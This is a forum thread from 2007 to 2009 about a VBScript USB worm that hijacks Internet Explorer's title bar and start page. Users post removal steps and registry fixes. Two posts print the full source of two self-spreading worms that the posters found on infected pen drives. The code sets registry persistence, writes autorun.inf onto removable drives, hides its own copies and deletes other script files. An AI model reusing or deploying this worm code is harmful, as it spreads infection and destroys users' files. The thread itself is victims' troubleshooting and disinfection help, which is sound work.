# wscript.exe is it to blame?



## gsoul2soul (Oct 19, 2007)

This is irritating like hell.... trust me !!!

Well somehow *i have contracted* this lil "*virus, or bug... or some script written by pesty over smart programmer*" grrrrr x(

Now thing is when i open IE it directs me to this site... and the IE title bar also has this "@!@#@ Holes name and all"

Now i remove the title bar "name" and also change the home page in my IE... and as soon as i restart my browser... Blast !! there you go, it appears again !!!

*BUT when i kill the "wscript.exe"* from "Windows Task manager" it won't happen... why ? what ? and how to remove this problem !!!

HELP... HELP
Mike here... desperate


----------



## QwertyManiac (Oct 19, 2007)

I think I already helped you with the same problem before or this is a false deja vu am experiencing ...

Anyway, you're infected with the "Hacked by Godzilla" attack.

Solution's here:
*howto.redcomputer.net/windows/hacked_by_godzilla.php


----------



## gsoul2soul (Oct 20, 2007)

qwerty maniac thanks... but that file is not there, the one i should delete. the "vbs file"

Anyways mine just says in IE title bar *"www.sujin.com.np" *and tries to r*e-direct my browser to this site*... which is now down 

help


----------



## QwertyManiac (Oct 20, 2007)

Site's pretty apologetic but I think its nearly the same infection.

From site (Google Cache):


> If you were directed here through a virus-like program, then I would like to apologize for the problems you had to face because of me. I didn't mean to harm anyone or anyone's computer through this program. The small little script was developed to prevent your computer from any sorts of virus attacks. The script that I developed, would repair any problems in your computer that other viruses had damaged and also prevent any other viruses to enter into your computer. I am sure your computer was not infected by any viruses as long as my script was running in your computer. If you don't believe me just check the script, which is located at the system32 directory as VirusRemoval.vbs
> 
> In order to free your computer from my program, please CLICK HERE to download a program called 'Scanner'.
> Run this program to free your computer from my script as well as some of the most common viruses.
> ...



Are the other files taken care of? Any other VBS files might be deleted as well. Perform the same steps just more flexibly 

And yes, delete ALL vbs and autorun from all your drives, even your externals, pen drives and phones.


----------



## gsoul2soul (Oct 20, 2007)

I opened one of my Pen drives... and found this *"Virusremoval.vbs"* and *"autorun.inf"*

Now i opened the VBS file in Notepad... and here what it says:
*Shall i click on it... or is it just a way of infecting more?*

'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'******************************************************************
'******************************************************************
'Program developed by
'Sujin Joshi
'*Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop


Count=Drv.DriveType

Do 
	If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
		set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
		WriteAll.Write AllFile 
		WriteAll.close
		set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
		WriteAll.Attributes = -1
	End If

	Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
	Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
	Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
	Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
	Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","*sujin.com.np/"
	Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
	Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
	SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

	For Each Drives In InDrive 
		root = Drives.Path & "\"
		If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
			Shells.Run "explorer.exe " & root
		End If
		Set folder=Fso.GetFolder(root)
		Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
		For Each files In folder.Files
			auto=Left(files.Name,7)
			If UCase(auto)=UCase("autorun") Then
				Set Delete = Fso.DeleteFile(root & files.Name,true)
			End If	
		Next
		If Drives.DriveType=2 Then
			delext "inf",Drives.Path & "\"
			delext "INF",Drives.Path & "\"
		End if  

		If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
			If Drives.Path<> "A:" Then
				delext "vbs",WinDir & "\"
				delext "vbs",Drives.Path  & "\"

				If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
					Fso.DeleteFile(Drives.Path & "\ravmon.exe")
				End If
				If Fso.FileExists(Drives.Path & "\sxs.exe") Then
					Fso.DeleteFile(Drives.Path & "\sxs.exe")
				End If
				If Fso.FileExists(Drives.Path & "\winfile.exe") Then
					Fso.DeleteFile(Drives.Path & "\winfile.exe")
				End If
				If Fso.FileExists(Drives.Path & "\run.wsh") Then
					Fso.DeleteFile(Drives.Path & "\run.wsh")
				End If

				If Drives.DriveType = 1 Then
					If Drives.Path<>"A:" Then
						If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
							Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
							WriteAll.Write AllFile
							WriteAll.Close
							Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
							WriteAll.Attributes = -1
						End If

						If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then 
							Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
							Chg.Attributes = -8
							Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
							WriteAll.writeline "[autorun]"
							WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
							WriteAll.WriteLine "shell\open=Open"
							WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
							WriteAll.Close
							Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
							WriteAll.Attributes = -1
						else
							Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
							WriteAll.writeline "[autorun]"
							WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
							WriteAll.WriteLine "shell\open=Open"
							WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
							WriteAll.Close
							Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
							WriteAll.Attributes = -1
						End if
					End If
				End If
			End if  
		End If
	Next

	if Count <> 1 then
	Wscript.sleep 10000
	end if
loop while Count<>1

sub delext(File2Find, SrchPath)
   Dim oFileSys, oFolder, oFile,Cut,Delete
   Set oFileSys = CreateObject("Scripting.FileSystemObject")
   Set oFolder = oFileSys.GetFolder(SrchPath)
   For Each oFile In oFolder.Files
		Cut=Right(oFile.Name,3)
		If UCase(Cut)=UCase(file2find) Then
			If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
		End If
   Next
End sub


----------



## Yavin (Oct 28, 2007)

First
Open task manager and kill process wscript.exe.

Then
Delete VirusRemoval.vbs and Autorun.inf files from all usb drives.

Then
Go to c:\Windows\System32 and delete the file VirusRemoval.vbs. It is super hidden so first go to Folder Options and check show hidden and super hidden check boxes. Also required for the above files.

Then
Go to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
On the right side look for Shell which should have value of just explorer.exe.
delete anything after explorer.exe.

Under same key Winlogon also look for Userinit which should have value of
c:\WINDOWS\system32\userinit.exe,
Delete all the crap after the comma.

Then
Go to HKCU\Software\Microsoft\Internet Explorer\Main
On the right side locate Window Title and delete its value i.e. Sujin.com.np

Under the same key locate Start Page and delete its value i.e. *sujin.com.np/

I think that's all guys. I'm sure it will help.


Guys u can also disable the use of vbs and js files from the registry. For that
Go to HKLM\Software\Microsoft\Windows Script Host\Settings
On the right look for REG_SZ called Enabled and change its value to 0 to turn Windows Scripting Host. After this even if you accidentally click on vbs  or js files it will display the message you can see on your own.


----------



## NavinRaj (Nov 15, 2007)

Yavin's process removes the virus but it is a bit tedious. I found a scanner tool which easily removed the virus. It claims to remove other viruses and enable the disabled task manager and folder options.

You guys can also try it from:

*www.kusom.edu.np/new/notices_detail.php?noticeid=13
or
*www.swiftnepal.net/



			
				Yavin said:
			
		

> First
> Open task manager and kill process wscript.exe.
> 
> Then
> ...


----------



## bhutanesedude (Nov 24, 2007)

Does any one have a software of Antivirus which can remove this sujin.com.np? I think I have to inform the case to Cyber Crime Investigation so that who ever is this Sujin is wrecked for the whole life to avoid in making such kind of tools. this hell **** is making my system slow and even I cannot do my work efficiently.


----------



## saubrl (Nov 26, 2007)

Dont u use any antivirus?
I use NOD32 with update 3 month old but even it is able to detect wscript.exe.


----------



## bhutanesedude (Nov 26, 2007)

NOD32? Does this functions good enough to clear this virus from every corner o our system? or it just takes out the title and web address from our IE.....I think *www.swiftnepal.net/ has a anti virus for this problem which functions well...what u think my fellow users?


----------



## apslogin@gmail.com (Dec 7, 2007)

How can remove Virusremoval.vbs 


Setp1pen My computer
Setp 2: go to toos Menu>folder Options>view (TAb)> Uncheck Hide extentions for known file types & check Show hiden file and folder & unchek Hide protected operating system files.
Step3: go run> c:\windows\system32\
Step4: Search "Virsuremoval.vbs"
Step5:rename file "Virsuremoval.vbs" to "virusremoval"

and 

Enjoy!


----------



## prakash2119 (Jan 19, 2008)

@Yavin thanks a lot bhai.Iam in loss of words to thank you.This really worked...


----------



## figjam00 (Mar 28, 2008)

I solved this wscript.exe but windows script host settings always run at startup ??????  plz reply!!!!!!!!


----------



## Wilhelm (Aug 1, 2009)

I opened one of my Pen drives... and found this "auto1.vbs" and "autorun.inf"

Now i opened the VBS file in Notepad... and here what it says:
Shall i click on it... or is it just a way of infecting more?



On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "auto1.vbs" Then 
   wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
   scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\auto1.vbs")

Set myFile = fso.CreateTextFile(win & "\auto1.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\auto1.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe1", "wscript.exe """ & win & "\auto1.vbs"""

If ax = false Then wscr.Run "wscript.exe """ & win & "\auto1.vbs"""

While (true)

   Set myDrives = fso.Drives
   For Each myFlashDrive In myDrives

      If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

         If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
            Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
            fAttr.Attributes=32
            fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
         End If

         Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
         auFile.write "[autorun]" & vbCrLf & "open=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Command=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Default=1"
         auFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
         fAttr.Attributes=39

         Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\auto1.vbs", true)
         myFile.write scrText
         myFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\auto1.vbs")
         fAttr.Attributes=39

      End If

   Next

   With wscr
      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\auto1.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
   End With

   If tf <> win & "\auto1.vbs" Then
      If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
   End If

   WScript.Sleep 10000

Wend


----------



## Saksham ghimire (Aug 5, 2009)

The post from NavinRaj should definitely work because it had been a big issue in Nepal several years ago and the tool suggested fixed it good.


----------

